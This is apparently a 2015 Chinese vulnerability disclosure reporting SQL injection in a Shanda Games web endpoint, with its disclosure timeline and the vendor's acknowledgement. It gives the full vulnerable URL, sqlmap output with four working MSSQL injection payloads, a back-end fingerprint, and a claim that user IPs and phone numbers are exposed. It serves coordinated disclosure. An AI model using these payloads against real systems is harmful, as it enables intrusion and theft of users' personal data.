2015-06-05: 细节已通知厂商并且等待厂商处理中 2015-06-05: 厂商已经确认,细节仅向厂商公开 2015-06-15: 细节向核心白帽子及相关领域专家公开 2015-06-25: 细节向普通白帽子公开 2015-07-05: 细节向实习白帽子公开 2015-07-20: 细节向公众公开
盛大游戏又一发注入,权限不高只能查询自己的表。能看到用户激活时的IP和手机号码。
存在注入的地址:
http://blood.sdo.com/NewsApp/GetVoteInfo.ashx?naId=1&bm=utf-8&t=0.3482579686222665&jsoncallback=jQuery110206128954326713232_1433462792000&_=1433462792002&nacId=217818
Payload:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: nacId Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: naId=1&bm=utf-8&t=0.3482579686222665&jsoncallback=jQuery110206128954326713232_1433462792000&_=1433462792002&nacId=217818' AND 8946=8946 AND 'KKsY'='KKsY Vector: AND [INFERENCE] Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: naId=1&bm=utf-8&t=0.3482579686222665&jsoncallback=jQuery110206128954326713232_1433462792000&_=1433462792002&nacId=217818' AND 2110=CONVERT(INT,(SELECT CHAR(113)+CHAR(99)+CHAR(100)+CHAR(110)+CHAR(113)+(SELECT (CASE WHEN (2110=2110) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(110)+CHAR(113))) AND 'puHS'='puHS Vector: AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')) Type: UNION query Title: Generic UNION query (NULL) - 11 columns Payload: naId=1&bm=utf-8&t=0.3482579686222665&jsoncallback=jQuery110206128954326713232_1433462792000&_=1433462792002&nacId=217818' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(99)+CHAR(100)+CHAR(110)+CHAR(113)+CHAR(82)+CHAR(108)+CHAR(99)+CHAR(68)+CHAR(107)+CHAR(118)+CHAR(90)+CHAR(110)+CHAR(89)+CHAR(67)+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(110)+CHAR(113),NULL-- Vector: UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,[QUERY],NULL-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query) Payload: naId=1&bm=utf-8&t=0.3482579686222665&jsoncallback=jQuery110206128954326713232_1433462792000&_=1433462792002&nacId=-7349' OR 5039=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'huTO'='huTO Vector: OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)---[18:43:29] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2008 R2 or 7web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NETback-end DBMS: Microsoft SQL Server 2008
和其他游戏公用一个数据库,但是权限不够无法查看。
泄露大量用户IP地址和手机号:
你懂得。会有礼物吗?好期待~~
危害等级:高
漏洞Rank:15
确认时间:2015-06-05 12:13
谢谢报告,下午修复!!
暂无